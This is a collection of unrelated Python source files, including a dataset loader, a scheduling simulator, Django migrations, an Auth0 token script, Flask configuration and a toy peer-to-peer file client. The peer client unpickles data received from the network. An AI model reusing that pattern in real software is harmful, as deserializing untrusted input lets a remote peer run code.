        """Delegate unknown attributes to the underlying dataset."""
        if self._dataset:
            return getattr(self._dataset, key, None)
        return None

    def _initSession(self):
        """
        Initiailze pydap session for loading data

        Initialize a session for a data set given a username, password, and
        URL for the data. Any previously open sessions are closed.
        Returns True on success, False on failure.
        """
        self.log.debug( f'Initializing session : {self.url}' )
        try:
            self._session.close()
        except Exception as err:
            self.log.debug( f'Failed to close previous session: {err}' )
        try:
            self._session = setup_session(
                self.kwargs.get('username', USER),
                self.kwargs.get('password', PASSWD),
                check_url = self.url
            )
        except Exception as err:
            self.log.error( f'Failed to start session: {err}' )
            return False
        return True

    def _initDataset(self):
        """Open pydap dataset for reading; returns True on success."""
        self.log.debug( f'Loading dataset : {self.url}' )
        try:
            self._dataset.close()
        except Exception as err:
            self.log.debug( f'Failed to close previous dataset: {err}' )
        if not self._initSession():
            return False
        try:
            self._dataset = open_url( self.url, session = self._session )
        except Exception as err:
            self.log.error( f'Failed to open dataset: {err}' )
            return False
        return True

    def _randomReload(self):
        """
        Reload dataset after random delay

        Close the remote file, sleep a uniformly random 15-45 minutes
        ((U[0,1) + 0.5) * 1800 seconds), then reopen the remote dataset.
        """
        self.log.debug( f'Reloading dataset, closing : {self.url}' )
        self.close()
        dt = float( np.random.random( 1 ) )
        dt = (dt + 0.5) * 1800
        self.log.debug( 'Sleeping {:4.1f} mintues'.format( dt / 60.0 ) )
        time.sleep( dt )
        self._initDataset()

    def close(self):
        """Safely close remote dataset"""
        # Best-effort cleanup; narrowed from bare 'except:' so that
        # KeyboardInterrupt/SystemExit are not swallowed.
        try:
            self._session.close()
        except Exception:
            pass
        try:
            self._dataset.close()
        except Exception:
            pass
        self._session = None
        self._dataset = None

    def getVarAtts( self, varName, slices = None, retry = None ):
        """Download a variable's attribute dict (plus its 'dimensions');
        returns None after all retries fail."""
        self.log.info( f'Getting attributes : {varName}' )
        if not isinstance(retry, int): retry = self.retry
        attempt = 0
        while attempt < retry:
            attempt += 1
            try:
                atts = self._dataset[varName].attributes
                atts['dimensions'] = self._dataset[varName].dimensions
            except Exception:
                self.log.warning( FAILEDFMT.format(attempt, retry, 'attributes') )
                self._randomReload()
            else:
                return atts
        return None

    def getValues( self, varName, slices = None, retry = None ):
        """Download a variable's values (whole array unless 'slices' is
        given); returns None after all retries fail."""
        self.log.info( f'Getting data : {varName}' )
        if not isinstance(retry, int): retry = self.retry
        attempt = 0
        # NOTE(review): this shape read happens outside the retry loop and
        # can itself raise on a dead connection.
        dims = self._dataset[varName].shape
        if slices is None:
            slices = []
            for i in range( len(dims) ):
                slices.append( slice(0, dims[i]) )
            slices = tuple( slices )
        while attempt < retry:
            attempt += 1
            try:
                values = self._dataset[varName].data[ slices ]
            except Exception:
                self.log.warning( FAILEDFMT.format(attempt, retry, 'data') )
                self._randomReload()
            else:
                return values
        return None

    def getVar( self, varName, slices = None, scaleandfill = False):
        """Fetch (values, attributes) for a variable, byte-swapping to the
        native order and optionally applying scaleFillData().  Returns
        (None, None) on failure."""
        atts = self.getVarAtts( varName )
        if atts is not None:
            values = self.getValues( varName, slices = slices)
            if values is not None:
                if values.dtype.byteorder == SWAPPED:
                    dt = np.dtype( str(values.dtype).replace(SWAPPED, NATIVE) )
                    values = values.astype( dt )
                if scaleandfill:
                    return scaleFillData(values, atts), atts
                else:
                    return values, atts
        return None, None
|
# -*- coding: utf-8 -*-
"""
Created on Thu May 13 16:45:33 2021

FCFS (first-come, first-served) CPU-scheduling simulator: reads a process
table from a text file, replays the schedule tick by tick, and prints each
process's turnaround/waiting/response times plus overall CPU utilization.

@author: ad
"""
from collections import deque
process_list = [] #['id','arrival time','service time','state','waiting time'] per process
process_queue = deque()
process_num = 0 #number of processes
t = 0 #simulated current time
end_process = [] #log entries of finished processes, used for the final report
#read the input file (prompt text is user-facing Korean: "enter file to read")
file = input("읽을 파일을 입력: ")
f = open(f"./example_fcfs_srt/{file}.txt",'r')
lines = f.readlines()
f.close()
#parse one process per line: whitespace-separated ints, then state + waiting time
for line in lines:
    line = line.split(" ")
    line = ' '.join(line).split()
    line = list(map(int,line))
    line.append('Not-Running')
    line.append(0) #waiting time
    process_list.append(line)
#the first line of the file holds the process count
process_num = process_list.pop(0)
process_num = int(process_num[0])
#print(process_num)
#print(process_list)
#Start
cpu_state = [] #['id', 'Turnaround Time', 'Waiting Time', 'Response Time', 'Running Time']
#sum of all service times (numerator of CPU utilization)
cpu_utilization = 0
for process in process_list:
    cpu_utilization += process[2]
while(True):
    #retire the running process once its full service time is consumed
    if cpu_state: #CPU is not idle
        if cpu_state[4] == Running_cpu[2]: #cpu Running Time == service time
            #report the finished process
            Running_cpu[3]="Exit"
            print(f'[{t}] PID({Running_cpu[0]}): {Running_cpu[3]}') #[t=exit time] PID([id]): [state]
            #finalize its log record
            cpu_state[1] = t - Running_cpu[1] #Turnaround_Time
            end_process.append(cpu_state) #append to the report list
            cpu_state=[] #reset -> CPU idle
    #stop when no processes remain and every one has finished
    if not process_list and process_num == len(end_process):
        break
    #move a process whose arrival time equals the current tick into the queue
    for i in range(0, len(process_list)):
        process = process_list[i]
        if process[1] == t:
            print(f'[{t}] PID({process[0]}): {process[3]}') #[t=arrived] PID([id]): Not-Running
            process_queue.append(process_list.pop(i)) #enqueue
            break
    if not cpu_state and process_queue: #CPU idle -> dispatch next queued process
        Running_cpu=process_queue.popleft()
        #initialize the CPU-state record for the dispatched process
        cpu_state = [Running_cpu[0], 0, Running_cpu[4], t - Running_cpu[1], 1] #id, Turnaround Time, Waiting Time, Response Time, Running Time
        Running_cpu[3]='Running'
        #report the newly running process
        print(f'[{t}] PID({Running_cpu[0]}): {Running_cpu[3]}') #[t=start] PID([id]): Running
    elif cpu_state:
        cpu_state[4] += 1
    #advance simulated time by one tick
    t += 1
    #bump waiting time for every process still queued
    for waiting_process in process_queue:
        waiting_process[4] += 1
print()
#CPU utilization = total service time / total elapsed time, as a percentage
cpu_utilization /= t
cpu_utilization *= 100
#print per-process log records
print('Log of Process Scheduling')
average_t = 0 #Average Turnaround Time
average_w = 0 #Average Waiting Time
average_r = 0 #Average Response Time
end_process.sort(key=lambda x: x[0]) #sort by process id
for Log in end_process:
    average_t += Log[1]
    average_w += Log[2]
    average_r += Log[3]
    print(f'PID({Log[0]}) Turnaround Time: {Log[1]} Waiting Time : {Log[2]} Response Time : {Log[3]}')
print()
print(f'Average Turnaround Time: {round(average_t/process_num, 2)}')
print(f'Average Waiting Time: {round(average_w/process_num, 2)}')
print(f'Average Response Time: {round(average_r/process_num, 2)}')
print(f'CPU Utilization : {round(cpu_utilization, 2)}%')
# Split target image into an MxN grid
def splitImage(image, size):
    """Return the m*n tiles of *image*, cropped row by row.

    *size* is (m, n): m grid rows by n grid columns.  Remainder pixels on
    the right/bottom edges are discarded by the integer tile size.
    """
    m, n = size
    tile_w = image.size[0] // n
    tile_h = image.size[1] // m
    return [
        image.crop((col * tile_w, row * tile_h,
                    (col + 1) * tile_w, (row + 1) * tile_h))
        for row in range(m)
        for col in range(n)
    ]
"""
Use this script to generate access tokens for use in development.
This requires that you configure in your .env the username and password for the OCCUR Test User
account. Reach out to Luke for help using this script.
"""
import requests
import os
import dotenv
from datetime import datetime, timedelta
dotenv.load_dotenv()
username = os.getenv("TEST_USERNAME")
password = os.getenv("TEST_PASSWORD")
# Request an Auth0 access token via the resource-owner-password grant.
r = requests.post('https://occur.us.auth0.com/oauth/token', data={
    "grant_type": "password",
    "client_id": "OUr5pR1GCGKp7krFCbcZ1SwkxZLwTYo8",
    "audience": "occur-api",
    "username": username,
    "password": password,
})
# ANSI escape sequences for colorful output
set_bold_red = "\033[1m\033[91m"
set_bold_green = "\033[1m\033[92m"
set_bold_yellow = "\033[1m\033[93m"
clear = "\033[0m"
if r.ok:
    data = r.json()
    print(set_bold_green, "Access token:", clear, sep="", end=" ")
    print(data["access_token"])
    print(set_bold_yellow, f"Valid until:", clear, sep="", end=" ")
    expiration = datetime.now() + timedelta(seconds=data["expires_in"])
    # NOTE(review): '%-d'/'%-I' are glibc/macOS strftime extensions and
    # raise on Windows.
    print(expiration.strftime('%B %-d at %-I:%M %p'))
else:
    print(set_bold_red, f"Something went wrong ({r.status_code}):", clear, sep="", end=" ")
    if not (username and password):
        print("You must configure TEST_USERNAME and TEST_PASSWORD in .env to use this script.")
    else:
        print(r.json()["error_description"])
def get_token():
    """Request an Auth0 access token for the configured test user.

    Returns the access-token string on success, or None when the request
    fails (bad credentials or missing TEST_USERNAME/TEST_PASSWORD).
    """
    username = os.getenv("TEST_USERNAME")
    password = os.getenv("TEST_PASSWORD")
    r = requests.post('https://occur.us.auth0.com/oauth/token', data={
        "grant_type": "password",
        "client_id": "OUr5pR1GCGKp7krFCbcZ1SwkxZLwTYo8",
        "audience": "occur-api",
        "username": username,
        "password": password,
    })
    if r.ok:
        # Bug fix: 'data' was never assigned here, so the success path
        # raised NameError.
        return r.json()["access_token"]
    # Bug fix: the failure branch was a bare 'None' expression with no
    # return statement; make it explicit.  The unused ANSI color locals
    # are removed.
    return None
|
# Generated by Django 2.2.7 on 2019-11-17 17:14
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: make Teacher.mname nullable (max_length=10)."""

    dependencies = [
        ('tssite', '0003_auto_20191117_1712'),
    ]

    operations = [
        migrations.AlterField(
            model_name='teacher',
            name='mname',
            field=models.CharField(max_length=10, null=True),
        ),
    ]
|
from django.db import models
class InventoryTrackingUrl(models.Model):
    """One tracked device: identity (serial/model/GTIN), lifecycle dates,
    and the proxy URL / unique string used for QR tracking."""
    serial_number = models.CharField(max_length=50, null=False)
    model_string = models.CharField(max_length=50, null=False)
    gtin_number = models.CharField(max_length=50, null=False)
    base_model = models.CharField(max_length=50, null=False)
    business_unit = models.CharField(max_length=50)
    device_create_date = models.DateTimeField()
    device_ship_date = models.DateTimeField()
    create_date = models.DateTimeField(null=True)
    update_date = models.DateTimeField(null=True)
    proxy_url = models.CharField(max_length=100)
    unique_string = models.CharField(max_length=50)

    def __str__(self):
        # Identify rows by GTIN in the admin and shell.
        return self.gtin_number

    class Meta:
        verbose_name = 'InventoryTrackingUrl'
        verbose_name_plural = 'InventoryTrackingUrl'
# class QrCodeURLData(models.Model):
# key = models.CharField(max_length=25, null=False)
# value = models.CharField(max_length=25, null=False)
#
# def __str__(self):
# return self.key
#
# class Meta:
# verbose_name = "QR Code Base Data"
# verbose_name_plural = "QR Code Base Data"
|
#!/usr/bin/env python
# converts a .m3u8 (Plex) => .txt (Pulsar for Android)
import sys
import os
import urllib.parse
import re
import time
filepath = sys.argv[1]
# Android SD-card music root and the Plex playlist prefix it replaces.
sd_card_music = "/storage/3366-6437/Music"
plex_playlist_prefix = "/Volumes/backup/bnixbook-music/Music"
if not os.path.isfile(filepath):
    print("File path {} does not exist. Exiting...".format(filepath))
    sys.exit()
lines = []
pattern = r"^[^\#]"  # keep only non-comment playlist entries
# Fix: context managers guarantee both files are closed (the originals
# relied on manual close and leaked on error); the unused line counter
# is removed.
with open(filepath) as fp:
    for line in fp:
        if re.search(pattern, line) is not None:
            f_line = urllib.parse.unquote(line).replace("\n", "")
            f_line = f_line.replace(plex_playlist_prefix, sd_card_music)
            lines.append(f_line)
new_filepath = filepath.replace(".m3u8", "_{}.txt".format(int(time.time())))
with open(new_filepath, "w") as fo:
    fo.writelines(line + "\n" for line in lines)
print("Wrote {} entries to {}".format(len(lines), new_filepath))
|
/Users/daniel/anaconda/lib/python3.6/struct.py |
def is_prime(number):
    """Return True if *number* is prime, False otherwise.

    Implements the tests one by one: values below 2 are not prime, 2 and
    3 are, even numbers are not, then trial division by odd divisors up
    to sqrt(number) -- O(sqrt(n)).
    """
    if number < 2:
        return False
    if number < 4:          # 2 and 3 are prime
        return True
    if number % 2 == 0:
        return False
    divisor = 3
    while divisor * divisor <= number:
        if number % divisor == 0:
            return False
        divisor += 2
    return True
class InvalidNumberError(Exception):
    """Error type for invalid numeric input.

    NOTE(review): nothing in this module raises it yet; presumably
    intended for bad arguments to is_prime -- confirm with callers.
    """
    pass
|
import os
from os.path import dirname, abspath
import nodebin as project
def _env(env):
"""If ENV exit but with empty value, return empty string."""
return env if os.getenv(env) else ''
def _getenv(env, default=None):
    """Return the value of *env*, or *default* when it is unset or empty."""
    # os.getenv('') always returns None, so routing the name through
    # _env() makes an empty-valued variable fall back to *default* too.
    name = _env(env)
    return os.getenv(name, default)
class Config:
    """Base Flask configuration; subclasses select the database URL."""
    # Settings for Flask
    SECRET_KEY = _getenv('SECRET_KEY') # used for session
    TESTING = False
    # Pretty print JSON in API
    JSONIFY_PRETTYPRINT_REGULAR = True
    # Settings for Debug by Flask-DebugToolbar
    DEBUG_TB_PROFILER_ENABLED = True
    DEBUG_TB_INTERCEPT_REDIRECTS = False
    # Settings for Database by Flask-SQLAlchemy
    SQLALCHEMY_COMMIT_ON_TEARDOWN = False
    SQLALCHEMY_TRACK_MODIFICATIONS = False
    SQLALCHEMY_ECHO = False

    def __init__(self):
        # Make sure PROJECT_CONFIG is set
        Config._health_check()

    @staticmethod
    def _health_check():
        # Fail fast if <PROJECT>_CONFIG (e.g. NODEBIN_CONFIG) is unset/empty.
        project_config = '{}_CONFIG'.format(project.__name__.upper())
        if not _getenv(project_config):
            raise Exception(
                'Environment variable {} is not set'.format(project_config)
            )
class DevConfig(Config):
    """Development settings: debug on, sqlite fallback database."""
    DEBUG = True
    # Settings for Database
    # If DATABASE_DEV is not available, use DATABASE_URL for Heroku support
    # If DATABASE_URL is not available neither, use local sqlite database
    SQLALCHEMY_DATABASE_URI = _getenv(
        'DATABASE_DEV',
        default=_getenv(
            'DATABASE_URL',
            default='sqlite:///{}_dev.sqlite3'.format(dirname(abspath(project.__file__)))
        ) # abspath is used for same behaviour of db migrate and run
    )
class TestConfig(Config):
    """Test settings: DATABASE_TEST with DATABASE_URL as fallback."""
    DEBUG = False
    # Settings for Database
    # If DATABASE_TEST is not available, use DATABASE_URL for Heroku support
    SQLALCHEMY_DATABASE_URI = _getenv(
        'DATABASE_TEST', default=_getenv('DATABASE_URL')
    )
class ProdConfig(Config):
    """Production settings: DATABASE_PROD with DATABASE_URL as fallback."""
    DEBUG = False
    # Settings for Database
    # If DATABASE_PROD is not available, use DATABASE_URL for Heroku support
    SQLALCHEMY_DATABASE_URI = _getenv(
        'DATABASE_PROD', default=_getenv('DATABASE_URL')
    )
# Registry mapping short environment names to their config classes.
config = {
    'dev': DevConfig,
    'test': TestConfig,
    'prod': ProdConfig,
}
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2016-12-25 10:52
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: rename Event.datetime -> event_dt and add
    load_dt / last_plot_dt / plotly_url fields."""

    dependencies = [
        ('mygoals', '0002_auto_20161223_2032'),
    ]

    operations = [
        migrations.RenameField(
            model_name='event',
            old_name='datetime',
            new_name='event_dt',
        ),
        migrations.AddField(
            model_name='event',
            name='load_dt',
            # Callable default: evaluated at save time (naive local time,
            # not timezone-aware timezone.now).
            field=models.DateTimeField(default=datetime.datetime.now),
        ),
        migrations.AddField(
            model_name='goal',
            name='last_plot_dt',
            field=models.DateTimeField(default=datetime.datetime.now),
        ),
        migrations.AddField(
            model_name='goal',
            name='plotly_url',
            field=models.CharField(default='noplotlyurl', max_length=100),
            preserve_default=False,
        ),
    ]
|
#!/usr/bin/env python3
# Advent of code Year 2019 Day 7 solution
# Author = seven
# Date = December 2019
import itertools
import sys
from os import path
sys.path.insert(0, path.dirname(path.dirname(path.abspath(__file__))))
from shared import vm
# Derive the puzzle-input path from this script's filename and read it whole.
# NOTE(review): str.rstrip strips a trailing CHARACTER SET, not a suffix;
# this only works because the remaining filename chars are not in "code.py".
# Also shadows the builtin input().
with open((__file__.rstrip("code.py") + "input.txt"), 'r') as input_file:
    input = input_file.read()
class AmpIO(vm.IO):
    """Amplifier IO port: the FIRST read returns the phase setting, every
    later read delegates to the normal vm.IO value."""

    def __init__(self, initial: int, phase: int):
        self.was_phase_read = False
        self.phase = phase
        super().__init__(initial=initial)

    @vm.IO.value.getter
    def value(self):
        # One-shot: hand out the phase once, then fall back to the base value.
        if self.was_phase_read:
            return super().value
        self.was_phase_read = True
        return self.phase
class SuspendableOutputVM(vm.VM):
    """Intcode VM that suspends itself after every output instruction, so
    amplifiers can be run round-robin in the feedback loop."""

    def store_to_output(self, a: vm.Param):
        super().store_to_output(a)
        self.suspend()
# Part One: run the amplifier chain once per phase permutation of 0-4,
# feeding each amp's output into the next, and keep the best final output.
max_out = None
max_phases = None
for permutation in itertools.permutations([0, 1, 2, 3, 4]):
    last_out = 0
    for phase in permutation:
        amp = AmpIO(initial=last_out, phase=phase)
        proc = SuspendableOutputVM(program=input, input=amp, output=amp)
        proc.run()
        last_out = proc.output.value
    if max_out is None or last_out > max_out:
        max_out = last_out
        max_phases = '{0}'.format(permutation)
print('Max amplify at phase setting: {0}'.format(max_phases))
print('Part One: {0}'.format(max_out))

# Part Two: feedback loop with phases 5-9.  Each amp's output port IS the
# next amp's input port (amp 4 wraps to amp 0); machines run round-robin,
# resuming after each output, until one halts.
max_out = None
max_phases = None
for permutation in itertools.permutations([5, 6, 7, 8, 9]):
    last_out = 0
    amps = []
    vms = []
    for phase in permutation:
        amps.append(AmpIO(initial=None, phase=phase))
    amps[0].value = 0   # seed the first amplifier with input 0
    # Create machines and hookup amps
    for i in range(0, 5):
        in_amp = amps[i]
        out_amp = amps[0] if i == 4 else amps[i+1]
        vms.append(SuspendableOutputVM(program=input, input=in_amp, output=out_amp))
    last_ran_index = 0
    while True:
        # NOTE(review): resume() is given the machine index -- semantics
        # defined in the project's shared.vm module, not visible here.
        vms[last_ran_index].resume(last_ran_index)
        if vms[last_ran_index].is_halt:
            break
        last_ran_index = (last_ran_index + 1) % 5
    last_out = vms[4].output.value
    if max_out is None or last_out > max_out:
        max_out = last_out
        max_phases = '{0}'.format(permutation)
print('Max amplify at phase setting: {0}'.format(max_phases))
print('Part Two: {0}'.format(max_out))
|
#Inputs
# Python 2 script: brute-force the lowest fixed monthly payment (in $10
# steps) that clears a credit-card balance within 12 months.
ibalance = 4773
annualInterestRate = 0.20
#Initialized
month = 0
payment = 10
total = 0
#Dependents
monthlyRate = annualInterestRate/12
balance = ibalance
# Simulate month by month; when 12 months pass with balance remaining,
# raise the payment by $10 and restart from the original balance.
while balance >= 0:
    #print 'Month: ' + str(month)
    month += 1
    print balance
    # Payment applied first, then interest accrues on the remainder.
    balance = balance - payment
    balance = balance + monthlyRate * balance
    if month >= 12 and balance > 0:
        payment +=10
        print payment
        balance = ibalance
        month = 0
print 'Lowest Payment: ' + str(payment)
|
# encoding: utf-8
'''
@Version: V1.0
@Author: JE2Se
@Contact: admin@je2se.com
@Website: https://www.je2se.com
@Github: https://github.com/JE2Se/
@Time: 2020/6/10 12:22
@File: __init__.py.py
@Desc: 自加载文件
'''
from exphub.conference.ConferenceScan import ConferenceScan |
from __future__ import absolute_import
import os
from StringIO import StringIO
from tempfile import NamedTemporaryFile
import webbrowser
from peggy.peggy import Label
_HTML_TEMPLATE_FILE = "data/dot_renderer.html"
_HTML_TEMPLATE = ""
def __init():
    """Load the HTML render template (data/dot_renderer.html, relative to
    this module) into the module-level _HTML_TEMPLATE string."""
    global _HTML_TEMPLATE
    path = os.path.dirname(os.path.abspath(__file__))
    with open(os.path.join(path, _HTML_TEMPLATE_FILE), "r") as html:
        _HTML_TEMPLATE = html.read()
class _LabelToDotConverter(object):
    """Convert a nested Label/terminal parse tree into Graphviz dot text.

    NOTE(review): Python 2 module -- uses StringIO from the py2 stdlib and
    the py2-only 'string_escape' codec below.
    """

    def __init__(self, items):
        self._items = items
        self._label_count = 0      # counter for Label (box) node ids
        self._terminal_count = 0   # counter for terminal node ids
        self._indent = 0
        self._dot = StringIO()

    def build_dot(self):
        """Emit the full 'digraph peggy_graph { ... }' into the buffer."""
        self._write("digraph peggy_graph {")
        self._indent = 1
        self._build_dot(self._items, None)
        self._indent = 0
        self._write("}")

    def _build_dot(self, items, parent):
        # Recursive walk: Labels become box nodes (and recurse into their
        # children); anything else becomes a terminal leaf node.
        for item in items:
            if isinstance(item, Label):
                self._label_count += 1
                label = "t" + str(self._label_count)
                self._write(label, " [shape=box,label=", '"(',
                            item.label, ')"];')
                if parent is not None:
                    self._write(parent, " -> ", label, ";")
                self._build_dot(item, label)
            else:
                self._terminal_count += 1
                label = "nt" + str(self._terminal_count)
                self._write(label, " [label=", '"',
                            str(item).encode("string_escape"), '"];')
                if parent is not None:
                    self._write(parent, " -> ", label, ";")

    def _write(self, *elements):
        # One dot statement per call, indented and newline-terminated.
        self._dot.write(" " * self._indent)
        for element in elements:
            self._dot.write(str(element))
        self._dot.write(os.linesep)

    def get_dot(self):
        """Return the accumulated dot source as a string."""
        return self._dot.getvalue()
def display(items, depth=1):
    """Print a nested tuple tree, one item per line, indenting one space
    per nesting level; non-tuple items are shown as (repr)."""
    indent = " " * depth
    for item in items:
        if not isinstance(item, tuple):
            print("{t}({i})".format(t=indent, i=repr(item)))
        else:
            display(item, depth + 1)
def display_labeled(items, depth=1):
    """Print a Label tree: Labels as (name) with their children indented
    one extra space, plain items via str()."""
    for item in items:
        if isinstance(item, Label):
            print("{t}({i})".format(t=" " * depth, i=item.label))
            display_labeled(item, depth + 1)
        else:
            print("{t}{i}".format(t=" " * depth, i=item))
def render_labeled(items):
    """Convert a Label tree to dot and open it rendered in the browser."""
    converter = _LabelToDotConverter(items)
    converter.build_dot()
    return _display_dot_string_in_browser(converter.get_dot())
def _display_dot_string_in_browser(dot_string):
    """Splice *dot_string* into the HTML template and open it in the
    default browser via a persistent temp file.

    NOTE(review): writing a str to NamedTemporaryFile's default binary
    mode only works on Python 2; the file is deliberately not deleted
    (delete=False) so the browser can read it, and is never closed here.
    """
    html = _HTML_TEMPLATE.replace("##graph##", repr(dot_string))
    f = NamedTemporaryFile(suffix="_peg.html", delete=False)
    f.write(html)
    webbrowser.open(f.name)
__init()
|
from mcvf import core, filters
# Demo pipeline: load a sample clip, apply one motion-compensated filter
# (the alternatives are kept disabled), preview it, and save the result.
print("Loading sample video...")
v = core.Video('test-video-4.mp4')
print("Filtering...")
# v.apply_filter(filters.MCGaussianFilter(block_size=20))
# v.apply_filter(filters.MCDarkenFilter(block_size=10))
# v.apply_filter(filters.MFDrawerFilter(block_size=20))
v.apply_filter(filters.MCMovingAvergeFilter(block_size=20))
print("Playing...")
v.play()
print("Saving...")
v.save_to_file("out.mp4", fps=24)
|
""" Add your Client class from your TCP assignment here """
# copy and paste your code from your client.py file
########################################################################################################################
# Class: Computer Networks
# Date: 02/03/2020
# Lab3: TCP Client Socket
# Goal: Learning Networking in Python with TCP sockets
# Student Name: John To and Chun Tat Chan
# Student ID: 917507752 and 916770782
# Student Github Username: l90320825 and chuntatchan
# Instructions: Read each problem carefully, and implement them correctly. No partial credit will be given.
########################################################################################################################
from torrent import Torrent
from message import Message
from downloader import Downloader
from file_manager import FileManager
from downloader import Downloader
import socket
import pickle
######################################## Client Socket ###############################################################3
"""
Client class that provides functionality to create a client socket is provided. Implement all the TODO parts
"""
class Client(object):
    """BitTorrent-style peer client: connects to a seeder, performs the
    handshake/interested exchange, then hands the socket to Downloader.

    NOTE(review): messages are exchanged with pickle -- unsafe on
    untrusted peers (pickle.loads executes arbitrary code).
    """

    def __init__(self, peer, id, message, torrent, announce, tracker, peerid, target, host="127.0.0.1", port=12000):
        """
        Class constructor
        """
        # NOTE(review): parameter 'id' shadows the builtin of the same name.
        self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # self.serversocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.host = host
        self.port = port
        self.peer = peer
        self.tracker = tracker
        self.client_id = None      # assigned by the server after connect
        self.announce = announce
        self.torrent = torrent
        self.peerid = peerid
        self.message = message # Send message
        self.file_manager = FileManager(torrent, peerid)
        self.target = target
        self.id = id

    def connect(self, server_ip_address, server_port):
        """
        Create a connection from client to server, run the handshake and
        'interested' exchange, then download via Downloader.  On return
        this peer becomes a seeder and the socket is closed.
        :param server_ip_address:
        :param server_port:
        :return:
        """
        self.client.connect((server_ip_address, server_port))
        self.set_client_id()
        # data dictionary already created for you. Don't modify.
        # data = {'student_name': self.student_name, 'github_username': self.github_username, 'sid': self.sid}
        #print("Handshaking")
        # Handshake: send info_hash + peer_id, await the reply.
        data = self.message.handshake
        data['info_hash'] = self.torrent.info_hash()
        data['peer_id'] = self.peerid
        self.send(data)
        data = self.receive()
        #print("Handshaking " + str(data))
        data = self.message.interested # Tell server client is interested to download
        self.send(data)
        data = self.receive()
        #print("Interested " + str(data))
        #self.send(data)
        #data = self.receive()
        #print(self.client.getsockname())
        Downloader(self.client, self.peerid, self.torrent, 1, 1, self).run()
        # Dead code below: manual block-by-block download loop superseded
        # by Downloader; kept for reference.
        """
        pieceIndex = 0
        while pieceIndex < 5:
            for i in range(8): # Download first piece
                data = self.message.request
                data['index'] = pieceIndex
                data['begin'] = self.torrent.block_size() * i
                data['length'] = self.torrent.block_size()
                self.send(data)
                data = self.receive()
                #print(data)
                blockIndex = self.file_manager.block_index(data['begin'])
                self.file_manager.flush_block(data['index'], blockIndex, data['block'])
                self.message._bitfield['bitfield'][pieceIndex][blockIndex] = True
            pieceIndex += 1
        """
        # while True: # client is put in listening mode to retrieve data from server.
        #     data = self.receive()
        #     if not data:
        #         break
        #     print(data)
        #     data = self.message.interested
        # do something with the data
        print("Client closing")
        # Download complete: this peer now serves the file.
        self.peer.role = 'seeder'
        print(self.peer.role)
        self.close()

    def send(self, data):
        """
        Serializes and then sends data to server
        :param data:
        :return:
        """
        serialized_data = pickle.dumps(data) # serialized data
        self.client.send(serialized_data)

    def receive(self, MAX_BUFFER_SIZE=4090):
        """
        Desearializes the data received by the server
        :param MAX_BUFFER_SIZE: Max allowed allocated memory for this data
        :return: the deserialized data.
        """
        raw_data = self.client.recv(MAX_BUFFER_SIZE) # deserializes the data from server
        return pickle.loads(raw_data)

    def set_client_id(self):
        """
        Sets the client id assigned by the server to this client after a succesfull connection
        :return:
        """
        data = self.receive() # deserialized data
        client_id = data['clientid'] # extracts client id from data
        self.client_id = client_id # sets the client id to this client
        #print("Client id " + str(self.client_id) + " assigned by server")

    def close(self):
        """
        Close this client's socket.
        :return: VOID
        """
        self.client.close()

    def run(self):
        """Bind the local endpoint, then connect to the target seeder."""
        # NOTE(review): binding a client socket before connect pins the
        # local address/port; presumably needed for NAT/peer bookkeeping.
        self.client.bind((self.host, self.port)) #connect to different pc, change to 127.0.0.1 if localhost
        #self.connect("10.0.0.246", 5000)#Test
        self.connect(self.target, 5000)
        # self.client.bind(("", self.port))
        # self.connect("172.20.176.1", 5000)

    # Dead code: earlier UDP-based server loop kept for reference.
    """
    def _bind(self):
        # TODO: bind host and port to this server socket
        :return: VOID
        self.serversocket.bind((self.host, self.port))
        #self.serversocket.listen(10)
        while True:
            message, clientAddress = self.serversocket.recvfrom(2048)
            print("Client recieve")
            print(clientAddress)
            message = pickle.loads(message)
            print(message)
            entry = {'nodeID': message['nodeId'], 'ip_address': message['ip'], 'port': message['port'], 'info_hash': message['info_hash'], 'last_changed': 'timestamp' }
            print(entry)
            self.tracker._routing_table_add(message['info_hash'], entry)
            self.connect(message['ip'], 5000)
    """
# main execution
if __name__ == '__main__':
    # Lab defaults; the actual client construction is left commented out.
    server_ip_address = "127.0.0.1" # don't modify for this lab only
    server_port = 12000 # don't modify for this lab only
    # client = Client(False)
    # client.connect(server_ip_address, server_port)
    # How do I know if this works?
    # when this client connects, the server will assign you a client id that will be printed in the client console
    # Your server must print in console all your info sent by this client
    # See README file for more details
|
import pygame.mixer
# Alias the pygame mixer module and initialize the audio subsystem.
sounds=pygame.mixer
sounds.init()
def wait_finish(channel):
    """Block until *channel* reports it is no longer busy (sound finished).

    Fix: the original spin-waited at 100% CPU; sleep briefly between
    polls instead.
    """
    import time  # local import keeps this file's top-level imports unchanged
    while channel.get_busy():
        time.sleep(0.01)
#s=sounds.Sound("correct.wav")
#wait_finish(s.play())#wait_finish makes sure the current sound finishes before the next one plays
#s2=sounds.Sound("wrong.wav")
#wait_finish(s2.play())
# Play the one enabled sample and block until playback completes.
s3=sounds.Sound("why.wav")
wait_finish(s3.play())
#s4=sounds.Sound("carhor.wav")
#wait_finish(s4.play())
|
import pandas
import random
def main():
    """Entry point: run one data generator; the alternatives are kept
    commented out for manual selection."""
    #city(10)
    #nomer(1000)
    #chelovek(10)
    # NOTE(review): sadnnie_nomera is defined elsewhere in this file and
    # is not visible here.
    sadnnie_nomera(1000)
    #chelovek(1000)
def city(n):
    """Generate *n* random (city, country, population) rows and write them
    to cities.csv (';'-separated; columns CityId, Name, Countries,
    Population).

    The original's five nested if/elif chains (one per country, one branch
    per city) are replaced by a single country -> [(city, population)]
    lookup table; the large block of dead code that sat in the docstring
    position is removed.
    """
    cities_by_country = {
        'Италия': [('Милан', 1352000), ('Рим', 2873000), ('Флоренция', 382000)],
        'Россия': [('Москва', 12500000), ('Санкт-Петербург', 5351935), ('Нижний Новгород', 1259000)],
        'Германия': [('Мюнхен', 1450000), ('Берлин', 3575000), ('Франкфурт', 736000)],
        'Нидерланды': [('Амстердам', 821000), ('Роттердам', 623000), ('Утрехт', 334000)],
        'Франция': [('Париж', 2200000), ('Лион', 500000), ('Дижон', 153000)],
    }
    countries = list(cities_by_country)
    array_index = []
    array_countries = []
    array_cities = []
    array_people = []
    for i in range(n):
        country = random.choice(countries)
        name, population = random.choice(cities_by_country[country])
        array_index.append(i)
        array_countries.append(country)
        array_cities.append(name)
        array_people.append(population)
